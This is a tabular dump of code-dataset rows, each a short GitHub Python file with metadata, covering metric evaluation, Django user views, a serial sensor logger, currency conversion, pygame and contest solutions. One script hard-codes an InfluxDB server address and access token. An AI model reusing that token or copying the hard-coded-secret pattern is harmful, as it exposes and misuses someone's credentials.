seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
41457270924 | import logging
from ex_2 import CORRECT_LABEL, INCORRECT_LABEL
logger = logging.getLogger(__name__)
# Running totals accumulated across evaluation iterations; updated by
# compile_stats() and reported by get_total_stats().
iterations = 0
total_tp = 0
total_fp = 0
total_tn = 0
total_fn = 0
total_accuracy = 0
total_recall = 0
total_precision = 0
def evaluate(head, correct_prob, incorrect_prob):
    """Classify one prediction into TP/FP/TN/FN and bump the matching counter.

    A sample is predicted "correct" when correct_prob >= incorrect_prob;
    the gold label in *head* then picks the confusion-matrix cell.
    Returns the cell name as a string.
    """
    global tp, fp, tn, fn
    predicted_correct = correct_prob >= incorrect_prob
    if predicted_correct and head == CORRECT_LABEL:
        tp += 1
        return 'TP'
    if predicted_correct:
        fp += 1
        return 'FP'
    if head == INCORRECT_LABEL:
        tn += 1
        return 'TN'
    fn += 1
    return 'FN'
def initialize_stats():
    """Reset the per-run confusion-matrix counters to zero."""
    global tp, fp, tn, fn
    tp = fp = tn = fn = 0
def compile_stats():
    """Fold the current run's confusion counts into the global totals.

    Returns a dict with this run's raw counts plus accuracy, recall and
    precision.  BUG FIX: recall/precision/accuracy are reported as 0.0 when
    their denominator is zero (no samples, no actual or predicted positives)
    instead of raising ZeroDivisionError as before.
    """
    global iterations, total_tp, total_fp, total_tn, total_fn, total_accuracy, total_recall, total_precision
    iterations += 1
    total_tp += tp
    total_fp += fp
    total_tn += tn
    total_fn += fn
    total = tp + fp + tn + fn
    accuracy = (1 - (fp + fn) / total) if total else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    total_accuracy += accuracy
    total_recall += recall
    total_precision += precision
    return {
        "total": {"TP": tp, "FP": fp, "TN": tn, "FN": fn},
        "accuracy": accuracy,
        "recall": recall,
        "precision": precision}
def get_total_stats():
    """Return confusion totals and metrics averaged over all compiled runs.

    BUG FIX: guards against ZeroDivisionError when compile_stats() was
    never called (iterations == 0); the averages are then 0.
    """
    runs = iterations if iterations else 1
    return {
        "total": {"TP": total_tp, "FP": total_fp, "TN": total_tn, "FN": total_fn},
        "accuracy": total_accuracy / runs,
        "recall": total_recall / runs,
        "precision": total_precision / runs}
| aserpi-uni/msecs-ml | ex_2/evaluation.py | evaluation.py | py | 1,566 | python | en | code | 1 | github-code | 90 |
39875228276 | #Napišite funkcijo, ki sprejme nabor podatkov v obliki dictionary-ja data in vrne največjo vrednost vsakega ključa
# (vrednosti so v obliki lista).
data = {"prices": [41970, 40721, 41197, 41137, 43033],
"volume": [49135346712, 50768369805, 47472016405, 34809039137, 38700661463]}
def najvecja_vrednost(podatki):
    """Return the maximum value of each key in *podatki* (a dict of lists).

    BUG FIXES vs the original: it used min() for the first key instead of
    max(), read the global ``data`` instead of the ``podatki`` argument,
    and hard-coded exactly two keys.  This version works for any number of
    keys, preserving the dict's insertion order.
    """
    return [max(vrednosti) for vrednosti in podatki.values()]
vrednosti = najvecja_vrednost(data)
print(vrednosti) | BlazButara/TP | DN3/Naloga2.py | Naloga2.py | py | 508 | python | sl | code | 0 | github-code | 90 |
1420954672 | class Car:
fuel = "petrol" # class variable
    def __init__(self):
        # Instance attributes: each Car object gets its own copy of these,
        # unlike the class variable `fuel` shared by all instances.
        self.milage =10 # instance variable (spelled "milage" throughout this file)
        self.company = "ABC" # instance variable
# Demo: instance assignment only affects that object; assigning through the
# class name changes the shared class variable for every instance.
c1 = Car()
c2 = Car()
c1.milage =8  # overrides the instance variable on c1 only
Car.fuel = "diesel" # need to use class name to modify class variables
print(c1.company, c1.milage, c1.fuel)
print(c2.company,c2.milage,c1.fuel) | AswathiMohan23/Python_Basics | Variables/Class_variables/class_variables.py | class_variables.py | py | 339 | python | en | code | 0 | github-code | 90 |
73644873257 | #!/usr/bin/python3
import signal
import sys
import serial
import time
import datetime
from influxdb_client.client.write_api import WriteApi, SYNCHRONOUS
from influxdb_client import InfluxDBClient, Point, WritePrecision, WriteOptions
import pandas as pd
# Open text file where data will be written (append mode).
# NOTE(review): the handle stays open for the life of the process and is
# only closed by the SIGINT handler below.
f = open('/media/rems/REMS/rems.txt', 'a')
# Define variables and the client to write to InfluxDB open source (OSS)
OSS_url = "http://138.253.48.88:8086"
# SECURITY NOTE(review): a live API token is hard-coded here; it should be
# loaded from an environment variable or a secrets file, not committed.
OSS_token = "gtWbY-DSA8NgaPyr_pEGQwf0W7T__2YcvQwmYoPGsU-7Tuvyz2dD1PfYGM7juGj3iAPZd6YNX2s9lX-FOL9Iiw=="
OSS_org = "UoL_environmental_monitoring"
OSS_bucket = "REMS_Strip Modules"
# Initialize OSS Client
OSS_client = InfluxDBClient(url=OSS_url, token=OSS_token, org=OSS_org)
# Serial data reading
def signal_handler(signal, frame):
    """SIGINT handler: close the log file and exit cleanly.

    BUG FIX: the original evaluated `f.closed` (a bool attribute — a no-op),
    leaving the file open; it now actually calls f.close().
    """
    print(" bye")
    f.close()
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1,
)
# Main loop: log every serial line to disk and push parsed records to InfluxDB.
while 1:
    x = ser.readline()
    if len(x) > 0:
        today = datetime.date.today()
        now = datetime.datetime.now()
        # Append a timestamped copy of the raw line to the on-disk log.
        f.write(str(now) + "\t" + x.decode())
        if x is not None:
            # Split the serial line into its fixed fields.
            x = node_id, status, voltage, atmega_temperature, wakeup_time, temperature, relative_humidity, rssi = x.split()
            # Convert the byte fields to ints/floats.
            raw_data = {}
            raw_data['node_id'] = int(node_id)
            raw_data['status'] = int(status)
            raw_data['voltage(V)'] = float(voltage)
            raw_data['atmega_temperature(°C)'] = float(atmega_temperature)
            raw_data['wakeup_time(s)'] = int(wakeup_time)
            raw_data['temperature(°C)'] = float(temperature)
            raw_data['relative humidity(%)'] = float(relative_humidity)
            raw_data['rssi(Signal strength(db))'] = int(rssi)
            # Classify incoming data by source (node_id 2 or node_id 3).
            # BUG FIX: json_body used to be left undefined for any other node
            # id, raising NameError below; unknown nodes are now skipped.
            json_body = None
            if "2" in str(node_id):
                json_body = [{"measurement":"Environmental data",
                              "tags":{"Device":"SHT85 node_id 2"},
                              "fields": raw_data
                              }]
            if "3" in str(node_id):
                json_body = [{"measurement":"Environmental data",
                              "tags":{"Device":"SHT85 node_id 3"},
                              "fields": raw_data
                              }]
            if json_body is None:
                continue
            # Create a data frame for display only.
            df = pd.DataFrame(data=raw_data, index=[pd.Timestamp.utcnow()])
            print (df)
            # Send data to the InfluxDB OSS.
            write_api_OSS = OSS_client.write_api(write_options=SYNCHRONOUS)
            write_api_OSS.write(OSS_bucket, OSS_org, json_body)
            # BUG FIX: the original called `client.close()` here — `client`
            # was never defined (NameError), and disposing the shared OSS
            # client inside the loop would break later writes; removed.
| ManexOA/UoL_Environmental_Monitoring_IoT | Liverpool_REMS_IoT_2022-11-25/Other Codes/SHT85_SerialRead_influxdb_OSS_OLD_VERSION_.py | SHT85_SerialRead_influxdb_OSS_OLD_VERSION_.py | py | 3,143 | python | en | code | 0 | github-code | 90 |
25219911827 | import tkinter as tk
def aktionSF():
    """Append a yellow confirmation label to the main window."""
    feedback = tk.Label(root, text="Aktion durchgeführt", bg="yellow")
    feedback.pack()
def grad_nach_kelvin():
    # Convert the Celsius value typed into the entry field to Kelvin and
    # display it as a new label.
    grad = int(eingabefeld_wert.get())
    # NOTE(review): uses the rounded offset 273; the exact value is 273.15.
    kelvin = grad + 273
    # .pack() returns None, so `textausgabe` is always None (harmless here).
    textausgabe = tk.Label(root, text=kelvin, bg="lightblue").pack()
root = tk.Tk()
# Create the heading label.
# NOTE: .pack() returns None, so label1/schaltf1/schaltf2/eingabefeld are None.
label1 = tk.Label(root, text="Etwas umrechnen").pack()
schaltf1 = tk.Button(root, text="Grad in Kelvin", command=grad_nach_kelvin, highlightbackground="gold").pack()
schaltf2 = tk.Button(root, text="Aktion durchführen", command=aktionSF, cursor='hand2').pack(side="bottom")
# Entry field for the temperature value to convert.
eingabefeld_wert=tk.StringVar()
eingabefeld=tk.Entry(root, textvariable=eingabefeld_wert).pack()
root.mainloop()
| Thieberius/python | gui/schaltflächen.py | schaltflächen.py | py | 769 | python | de | code | 0 | github-code | 90 |
18434763509 | a, b = map(int, input().split())
def f(x):
    """Prefix XOR 0 ^ 1 ^ ... ^ x, via the period-4 closed form."""
    r = x % 4
    if r == 3:
        return 0
    if r == 0:
        return x
    if r == 1:
        return x ^ (x - 1)
    return x ^ (x - 1) ^ (x - 2)
print(f(b) ^ f(a - 1)) | Aasthaengg/IBMdataset | Python_codes/p03104/s106897872.py | s106897872.py | py | 252 | python | en | code | 0 | github-code | 90 |
class Solution:
    def maxLen(self, n, arr):
        """Length of the longest subarray of arr[:n] whose elements sum to 0.

        Prefix-sum technique: two equal prefix sums bound a zero-sum
        subarray, so only the first index of each sum is remembered.
        (Also strips the dataset row-id that was fused onto the class
        header, which made the snippet unparseable.)
        """
        max_length = 0
        running = 0
        first_index = {}
        for i in range(n):
            running += arr[i]
            if running == 0:
                max_length = i + 1
            elif running in first_index:
                max_length = max(max_length, i - first_index[running])
            else:
                first_index[running] = i
        return max_length
| magdumsuraj07/data-structures-algorithms | questions/striever_SDE_sheet/22_largest_subarray_with_0_sum.py | 22_largest_subarray_with_0_sum.py | py | 412 | python | en | code | 0 | github-code | 90 |
72976832618 | from sklearn.model_selection import train_test_split
import pandas as pd
from datasets.dataset import Dataset
from sklearn import preprocessing
TRAIN_PATH = 'data/chess/chess.data'
n_features = 6
class ChessDataset(Dataset):
    """Chess endgame dataset loaded from a CSV file at TRAIN_PATH."""

    def __init__(self):
        column_names = ["c" + str(i) for i in range(n_features)] + ["target"]
        self._raw_train_data = pd.read_csv(TRAIN_PATH, names=column_names)
        self.name = 'chess'

    def get_classes(self):
        """Class labels: 'draw' plus depth-of-win names zero..sixteen."""
        return ['draw', 'zero', 'one', 'two', 'three', 'four', 'five',
                'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve',
                'thirteen', 'fourteen', 'fifteen', 'sixteen']

    def get_train_and_test_data(self):
        """One-hot encode the features and return a shuffled 75/25 split."""
        X_dummies, y_dummies = self._to_dummies()
        X_train, X_test, y_train, y_test = train_test_split(
            X_dummies, y_dummies, test_size=0.25, shuffle=True)
        # Package data into a dictionary
        return {
            'X_train': X_train, 'y_train': y_train,
            'X_test': X_test, 'y_test': y_test
        }

    @property
    def shape(self):
        # Shape of the raw (un-encoded) frame, including the target column.
        return self._raw_train_data.shape

    def _to_dummies(self):
        """One-hot encode the feature columns; return (X, y)."""
        frame = self._raw_train_data
        target = frame.iloc[:, [-1]]
        features = frame.drop(columns=['target'], axis=1)
        return pd.get_dummies(features), target
5098849098 | #正規表現モジュール、あのブログ(対応表の方)に書く
import re
# Bubble sort: sort the list in place and count the number of swaps.
n = int(input())
a = list(map(int, input().split()))
swaps = 0
swapped = True
while swapped:
    swapped = False
    for i in range(n - 1):
        if a[i] > a[i + 1]:
            a[i], a[i + 1] = a[i + 1], a[i]
            swaps += 1
            swapped = True
# str(a) is "[1, 2, 3]"; stripping '[', ']' and ',' leaves "1 2 3".
print(re.sub("[\[\]\,]","",str(a)))
print(swaps)
| WAT36/procon_work | procon_python/src/aoj/ALDS1_2_A_BubbleSort.py | ALDS1_2_A_BubbleSort.py | py | 378 | python | ja | code | 1 | github-code | 90 |
32057084907 | from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from CRM.api.serializers import UserSerializer
class UserViewSet(ViewSet):
    """Registration, token login/logout and staff management for users."""

    def get_permissions(self):
        # Registration and login are public; every other action needs a token.
        if self.action == "create" or self.action == "login":
            permission_classes = [AllowAny]
        else:
            permission_classes = [IsAuthenticated]
        return [permission() for permission in permission_classes]

    def create(self, request):
        """Register a new user and return their fresh auth token."""
        serializer = UserSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = serializer.save()
        token, _ = Token.objects.get_or_create(user=user)
        return Response(
            {"token": token.key, "user": serializer.data},
            status=status.HTTP_201_CREATED,
        )

    def login(self, request):
        """Exchange username/password for the user's auth token."""
        username = request.data.get("username")
        password = request.data.get("password")
        user = authenticate(username=username, password=password)
        # BUG FIX: validate the credentials *before* touching the token
        # table; the original called Token.objects.get_or_create(user=None)
        # on bad credentials, which raised instead of returning 400.
        if user is None:
            return Response(
                {"error": "Invalid data"},
                status=status.HTTP_400_BAD_REQUEST,
            )
        token, _ = Token.objects.get_or_create(user=user)
        return Response(
            {"token": token.key},
            status=status.HTTP_200_OK,
        )

    def logout(self, request):
        """Delete the caller's token, invalidating the session."""
        request.user.auth_token.delete()
        return Response(status=status.HTTP_200_OK)

    def perform_create(self, serializer):
        """Persist the user, honouring an optional is_staff flag."""
        is_staff = self.request.data.get("is_staff", False)
        user = serializer.save(is_staff=is_staff)
        # Removed the original's stray no-op expression statement `(user)`.
        user.is_staff = is_staff
        user.save()

    def set_staff(self, request, pk=None):
        """Let a superuser toggle another user's staff flag."""
        try:
            user = User.objects.get(pk=pk)
        except User.DoesNotExist:
            return Response(
                {"error": "User not found"}, status=status.HTTP_404_NOT_FOUND
            )
        if not request.user.is_superuser:
            return Response(
                {"error": "Permission denied"}, status=status.HTTP_403_FORBIDDEN
            )
        is_staff = request.data.get("is_staff", False)
        user.is_staff = is_staff
        user.save()
        return Response(
            {"detail": "User staff status updated successfully"},
            status=status.HTTP_200_OK,
        )

    def retrieve(self, request, pk=None):
        """Superuser-only detail view including the staff flag."""
        try:
            user = User.objects.get(pk=pk)
        except User.DoesNotExist:
            return Response(
                {"error": "User not found"}, status=status.HTTP_404_NOT_FOUND
            )
        if not request.user.is_superuser:
            return Response(
                {"error": "Permission denied"}, status=status.HTTP_403_FORBIDDEN
            )
        serializer = UserSerializer(user)
        return Response(
            {"is_staff": user.is_staff, "user": serializer.data},
            status=status.HTTP_200_OK,
        )
| vitorqf/nadic_backend | django/CRM/CRM/api/viewsets.py | viewsets.py | py | 3,294 | python | en | code | 0 | github-code | 90 |
18065114469 | import math
#import numpy as np
import queue
from collections import deque,defaultdict
import heapq as hpq
from sys import stdin,setrecursionlimit
#from scipy.sparse.csgraph import dijkstra
#from scipy.sparse import csr_matrix
ipt = stdin.readline
setrecursionlimit(10**7)
def main():
    """Read N then N integers; count pairs formed across consecutive values.

    A zero input clears the carried-over leftover; otherwise
    (carry + a) // 2 pairs are counted and the odd remainder carries on.
    """
    count = int(ipt())
    pairs = 0
    carry = 0
    for _ in range(count):
        value = int(ipt())
        if value == 0:
            carry = 0
        else:
            pairs += (carry + value) // 2
            carry = (carry + value) % 2
    print(pairs)
    return


if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p04020/s205937157.py | s205937157.py | py | 547 | python | en | code | 0 | github-code | 90 |
22824171012 | import requests
from django.conf import settings
def apply_exchange(amount, currency, dic):
    """Fetch live EUR-based rates and apply the rate for *currency*.

    Side effect: stores the fetched rate in *dic* under "rate".
    NOTE(review): dividing by the EUR->currency rate converts *amount*
    from *currency* into EUR — confirm the intended direction with callers.
    """
    url = f"https://freecurrencyapi.net/api/v2/latest?apikey={settings.CURRENCY_KEY}&base_currency=EUR"
    get_res_url = requests.get(url)
    results = get_res_url.json()
    rates = results["data"]
    rate = rates[currency]
    dic["rate"] = rate
    return amount / rate
def exchange_base_currency(base_currency):
    """Fetch and return the latest rate table keyed by currency code,
    relative to *base_currency*, from freecurrencyapi.net."""
    url = f"https://freecurrencyapi.net/api/v2/latest?apikey={settings.CURRENCY_KEY}&base_currency={base_currency}"
    get_res_url = requests.get(url)
    results = get_res_url.json()
    rates = results["data"]
    return rates
def calculator_exchange(amount, currency, dic, rates, base_currency):
    """Convert *amount* from *currency* into *base_currency* using *rates*.

    The applied rate is recorded in *dic* under "rate" as a side effect;
    a rate of 1 is used when *currency* already is the base currency.
    """
    rate = rates[currency] if currency != base_currency else 1
    dic["rate"] = rate
    return amount / rate
def palop_calculator_exchange(amount, currency, rates, base_currency):
    """Convert *amount* into *base_currency*; identity when already in it."""
    if currency == base_currency:
        return amount
    return amount / rates[currency]
def data_year_budget(data, dic_country_budget, rates, base_currency):
    """Sum one year's budgets converted into *base_currency*.

    For each row the functional-budget expense is preferred; the organic
    one is used as a fallback, and rows with neither are skipped.  Each
    converted amount is stored in *dic_country_budget* keyed by country
    name (a later row for the same country overwrites the earlier entry).
    Returns the grand total.
    """
    total_budget_year = 0
    for row in data:
        amount = row.expense_functional_budget
        if amount is None:
            amount = row.expense_organic_budget
        if amount is None:
            continue
        converted = palop_calculator_exchange(
            amount, row.budget.currency, rates, base_currency)
        dic_country_budget[row.budget.country.name] = converted
        total_budget_year = total_budget_year + converted
    return total_budget_year
| pabdelhay/paloptl | common/students/angola_lupossa.py | angola_lupossa.py | py | 1,975 | python | en | code | 0 | github-code | 90 |
7321227487 | import queue
import threading
from typing import Any, Callable
FINISHED = 'finished'
ERROR = 'error'
INFO = 'info'
class Event:
    """Status message passed from the worker thread to the consumer queue."""

    def __init__(self, evt_type: str, client_data: Any = None):
        # evt_type is one of the module constants FINISHED, ERROR or INFO.
        # (The original annotation was the tuple (ERROR, FINISHED, INFO),
        # which is not a valid type expression; plain str is used instead.)
        self.evt_type = evt_type
        self.client_data = client_data
class BgExec(threading.Thread):
    """Run *run_func* on a background thread, reporting the outcome on a queue."""

    def __init__(self, run_func: Callable[[], Any], status_queue: queue.Queue):
        super().__init__()
        self._run_func = run_func
        self._status_queue = status_queue

    def run(self) -> None:
        # Post a FINISHED event carrying the result, or an ERROR event
        # carrying the raised exception; never let the exception escape.
        try:
            outcome = self._run_func()
            self._status_queue.put(Event(FINISHED, outcome))
        except Exception as err:
            self._status_queue.put(Event(ERROR, err))
| mgeselle/spectra | bgexec.py | bgexec.py | py | 730 | python | en | code | 0 | github-code | 90 |
13002612478 |
def solution(numbers):
    """Return all distinct pairwise sums of *numbers*, in ascending order."""
    count = len(numbers)
    sums = {numbers[i] + numbers[j]
            for i in range(count - 1)
            for j in range(i + 1, count)}
    return sorted(sums)
18440027839 | N = int(input())
X = []
U = []
# Read N (value, currency) pairs; the currency is either JPY or BTC.
for _ in range(N):
    x, u = input().split()
    X.append(float(x))
    U.append(u)
ans = 0
# Sum everything in JPY, valuing one BTC at 380,000 JPY.
for x, u in zip(X, U):
    if u == 'JPY':
        ans += x
    else:
        ans += x*380000.
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03110/s659892403.py | s659892403.py | py | 230 | python | en | code | 0 | github-code | 90 |
17053090580 | import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
class DrawCrowd:
    """Bar-chart rendering of a crowd's wealth distribution."""

    def __init__(self, personcrowd):
        # personcrowd is expected to expose .crowd (a list of objects with a
        # .wealth attribute) and .person_num — TODO confirm against PersonCrowd.
        self.personcrowd = personcrowd

    def sort_and_draw(self):
        """Sort persons by wealth (ascending) and draw a labelled bar chart."""
        crowd_array = self.personcrowd.crowd.copy()
        crowd_array.sort(key=lambda x:x.wealth,reverse=False)
        wealth = [x.wealth for x in crowd_array]
        n = np.arange(self.personcrowd.person_num)
        plt.bar(n, wealth)
        for x, y in zip(n, wealth):
            # ha: horizontal alignment
            # va: vertical alignment
            plt.text(x + 0.4, y + 0.05, '%d' % y, ha='center', va='bottom')
        plt.show()
        # NOTE(review): savefig() after show() usually saves an empty figure;
        # call savefig before show if the PNG output matters.
        plt.savefig("one.png")
21483770831 | from __future__ import unicode_literals
from datetime import date, datetime
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core.mail import send_mail
from django.core.management.base import BaseCommand
from django.template import Context
from django.template.loader import get_template, render_to_string
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from aira.irma.main import agripoint_in_raster, model_results
from aira.models import notification_options, Profile
class Command(BaseCommand):
    """Management command that emails irrigation advice notifications."""

    help = "Emails irrigation advice notifications to users."

    def handle(self, *args, **options):
        # Entry point: notify each opted-in user about their own agrifields,
        # plus one extra notification per user they supervise.
        self.template = get_template('aira/email_notification.html')
        for user in User.objects.all():
            if not self.must_send_notification(user):
                continue
            # Send notification for user's own agrifields
            self.notify_user(user, user.agrifield_set.all(), user)
            # If user is a supervisor, send an additional notification to him
            # for each of the supervised users.
            for supervised_user in User.objects.filter(
                    profile__supervisor=user):
                self.notify_user(user, supervised_user.agrifield_set.all(),
                                 supervised_user)

    def must_send_notification(self, user):
        # notification_options maps the user's chosen frequency to a pair
        # whose second element is a predicate deciding if today is a send day.
        # Users without a profile or an unknown option get no notification.
        try:
            return notification_options[user.profile.notification][1](
                date.today())
        except (Profile.DoesNotExist, KeyError):
            return False

    def get_email_context(self, agrifields, user, owner):
        # Build the template context; returns None (and logs) when the model
        # produced no results for the first agrifield.
        context = Context()
        for f in agrifields:
            f.results = model_results(f, "YES")
        if agrifields[0].results is None:
            logging.error(
                ('Internal error: No results for agrifield {} of user {}; '
                 'omitting notification for that user').format(
                    agrifields[0].name, user))
            return None
        context['owner'] = owner
        context['sd'] = agrifields[0].results.sd
        context['ed'] = agrifields[0].results.ed
        context['agrifields'] = agrifields
        context['site'] = Site.objects.get_current()
        context['user'] = user
        context['timestamp'] = datetime.now()
        return context

    def notify_user(self, user, agrifields, owner):
        # Render and send one notification email about *owner*'s agrifields
        # to *user*, in the recipient's preferred language.
        agrifields = [f for f in agrifields if agripoint_in_raster(f)]
        if not agrifields:
            return
        logging.info('Notifying user {} about the agrifields of user {}'
                     .format(user, owner))
        translation.activate(user.profile.email_language)
        context = self.get_email_context(agrifields, user, owner)
        if context is None:
            return
        msg_html = render_to_string('aira/email_notification.html', context)
        # NOTE(review): `unicode` is Python 2 only; under Python 3 this line
        # raises NameError — confirm the project's target Python version.
        send_mail(_("Irrigation status for ") + unicode(owner),
                  '',
                  settings.DEFAULT_FROM_EMAIL,
                  [user.email, ],
                  html_message=msg_html)
| lulzzz/aira | aira/management/commands/send_notifications.py | send_notifications.py | py | 3,203 | python | en | code | null | github-code | 90 |
25096766318 | #!/usr/bin/env python3
import pygame
import numpy as np
import threading
import time
def wrap(angle):
    """Map a non-positive angle into (0, 360] by adding one full turn."""
    if angle > 0:
        return angle
    return 360 + angle
class Horizon:
    """Artificial-horizon widget: wings/tail symbol plus angle read-outs."""

    def __init__(self, font_size=None):
        # Default font size for the on-screen angle read-outs.
        if font_size is None:
            font_size = 20
        self.font = pygame.font.SysFont('timesnewroman', font_size)
        pass

    def draw(self, screen, angle):
        """Draw the horizon at *angle* (radians) centred on *screen*.

        NOTE(review): roll, pitch and heading read-outs are all derived
        from the same *angle* value — presumably placeholder demo behaviour.
        """
        deg = u'\xb0'  # degree sign
        dc = pygame.Color(102,0,204)    # dark purple
        mc = pygame.Color(191,128,255)  # mid purple
        lc = pygame.Color(230,204,255)  # light purple
        w, h = screen.get_size()
        rect = pygame.Rect(0,0,w,30)
        pygame.draw.rect(screen, dc, rect)  # heading strip along the top
        size = 75
        ax = size*np.cos(angle)
        ay = size*np.sin(angle)
        # fill the screen with a color to wipe away anything from last frame
        rect = pygame.Rect(w//2-30, h//2, 2*30, 75)
        pygame.draw.rect(screen, dc, rect, border_radius=5) # pitch bumpout
        pygame.draw.circle(screen,"white",(w//2,h//2),50,) # full circle
        pygame.draw.circle(screen,dc,(w//2,h//2),35) # small circle
        pygame.draw.circle(screen,lc,(w//2,h//2),50,5) # outline
        pygame.draw.line(screen, mc,(w//2-ax,h//2+ay),(w//2+ax,h//2-ay),5) # wings
        pygame.draw.line(screen, mc,(w//2,h//2),(w//2-ay,h//2-ax),5) # tail
        # Render the three text read-outs (degrees, one decimal place).
        roll = wrap(angle*180/3.14)
        roll = self.font.render(f"{roll:5.1f}{deg}", True, "white", dc)
        pitch = wrap(angle*180/3.14)
        pitch = self.font.render(f"{pitch:5.1f}{deg}", True, "white", dc)
        pw = pitch.get_width()
        screen.blit(pitch,(w//2-pw//2, h//2+50))  # pitch below the symbol
        heading = wrap(angle*180/3.14)
        heading = self.font.render(f"{heading:5.1f}{deg}", True, "white", dc)
        rw = roll.get_width()
        rh = roll.get_height()
        screen.blit(roll,(w//2-rw//2,h//2-rh//2))  # roll in the centre
        hw = heading.get_width()
        screen.blit(heading,(w//2-hw//2,0))  # heading in the top strip
# pygame setup
pygame.init()
screen = pygame.display.set_mode((300, 300), pygame.RESIZABLE)
clock = pygame.time.Clock()
running = True
cnt = 0
horizon = Horizon()


def counter():
    # Background thread: advance the demo angle counter 10 units per 100 ms.
    global cnt
    while running:
        cnt += 10
        print(cnt)
        pygame.time.wait(100)


t = threading.Thread(target=counter)
t.daemon = True
t.start()
while running:
    # poll for events
    # pygame.QUIT event means the user clicked X to close your window
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    w, h = screen.get_size()
    # Map the counter onto (-pi, pi) for the horizon demo.
    angle = (cnt % (2*314)) / 100 - 3.14
    # fill the screen with a color to wipe away anything from last frame
    screen.fill("black")
    horizon.draw(screen, angle)
    # flip() the display to put your work on screen
    pygame.display.flip()
    clock.tick(60) # limits FPS to 60
pygame.quit()
18290014609 | import sys
import numpy as np
sr = lambda: sys.stdin.readline().rstrip()
ir = lambda: int(sr())
lr = lambda: list(map(int, sr().split()))
MOD = 10 ** 9 + 7
# 組合せ nCr (MOD) 逆元を使う方法
def perm(n,k):
    """nPk modulo MOD, using the precomputed factorial tables."""
    if not 0 <= k <= n:
        return 0
    return fact[n] * fact_inv[n-k] % MOD
def cmb(n, k):
    """nCk modulo MOD, using the precomputed factorial tables."""
    if not 0 <= k <= n:
        return 0
    return fact[n] * fact_inv[k] % MOD * fact_inv[n-k] % MOD
def cumprod(arr, MOD):
    """Modular cumulative product of *arr*, vectorised via a square tiling.

    The sequence is padded onto a side x side grid (np.resize repeats
    elements; the padding is sliced off before returning).  Rows are first
    multiplied column-by-column, then each row is scaled by the previous
    row's last entry, yielding the running product of the original array.
    """
    length = len(arr)
    side = int(length**.5 + 1)
    grid = np.resize(arr, side**2).reshape(side, side)
    for col in range(1, side):
        grid[:, col] *= grid[:, col - 1]
        grid[:, col] %= MOD
    for row in range(1, side):
        grid[row] *= grid[row - 1, -1]
        grid[row] %= MOD
    return grid.ravel()[:length]
def make_fact(U, MOD):
    """Build factorial and inverse-factorial tables for 0..U-1 modulo MOD.

    fact_inv is derived from a single modular inverse of fact[U-1]
    (Fermat's little theorem) followed by a reversed cumulative product.
    """
    base = np.arange(U, dtype=np.int64)
    base[0] = 1
    fact = cumprod(base, MOD)
    inv = np.arange(U, 0, -1, dtype=np.int64)
    inv[0] = pow(int(fact[-1]), MOD-2, MOD)
    fact_inv = cumprod(inv, MOD)[::-1]
    return fact, fact_inv
U = 10 ** 5 + 100 # 階乗テーブルの上限
fact, fact_inv = make_fact(U, MOD)
N, K = lr()
A = np.array(lr())
A.sort()
if K == 1:
print(0); exit()
coef = np.zeros(N, np.int64)
coef[K-1:] = [cmb(n, K-1) for n in range(K-1, N)]
answer = (A * coef % MOD).sum() % MOD
coef = np.zeros(N, np.int64)
coef[:-K+1] = [cmb(n, K-1) for n in range(N-1, K-2, -1)]
answer -= (A * coef % MOD).sum() % MOD
print(answer%MOD)
# 53 | Aasthaengg/IBMdataset | Python_codes/p02804/s768562438.py | s768562438.py | py | 1,357 | python | en | code | 0 | github-code | 90 |
17996573269 | # BFS
# 現在の頂点、スコア、通過した頂点の数、を状態量としてもち、2*n個まで試す
# n個より多いものが最大になるのなら'inf'を出力
from collections import deque
from sys import stdin
def input():
    # NOTE: deliberately shadows the builtin input() with a faster stdin reader.
    return stdin.readline().strip()


inf = float('inf')
n, m = map(int, input().split())
edge = [[] for _ in range(n)]
weight = [[] for _ in range(n)]
# Read m directed weighted edges (1-indexed in the input).
for _ in range(m):
    i, j, k = map(int, input().split())
    i -= 1
    j -= 1
    edge[i].append(j)
    weight[i].append(k)
# seen[v]: best score found so far for vertex v.
seen = [-inf] * n
# BFS over (vertex, score, path length).  If an improving path to the goal
# still exists after n steps, a positive cycle feeds it, so the answer is
# unbounded; exploring is capped at 2*n steps.
todo = deque([(0, 0, 1)])
while len(todo) > 0:
    node, score, num = todo.popleft()
    if num > 2 * n:
        break
    for i in range(len(edge[node])):
        if seen[edge[node][i]] < score + weight[node][i]:
            seen[edge[node][i]] = score + weight[node][i]
            todo.append((edge[node][i], score + weight[node][i], num + 1))
            if edge[node][i] == n - 1 and num >= n:
                print('inf')
                exit()
print(seen[n-1])
26486022125 | import torch
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import KFold
import numpy
import torch.nn as nn
import spacy
# Make a github repo with cavas data
fold = KFold(n_splits=5)
X_Tests = []
Y_Tests = []
Epoch_loss = []
def line(x):
    """Reference line y = 0.5*x + 1 used as the regression target."""
    return x * 0.5 + 1
def mae(true_y, y_pred):
    """Mean absolute error between two numpy arrays."""
    return numpy.mean(numpy.abs(true_y - y_pred))
def average_All_Folds(list):
    """Arithmetic mean of the fold metrics.

    (The parameter name shadows the builtin `list`; kept for interface
    compatibility with existing callers.)
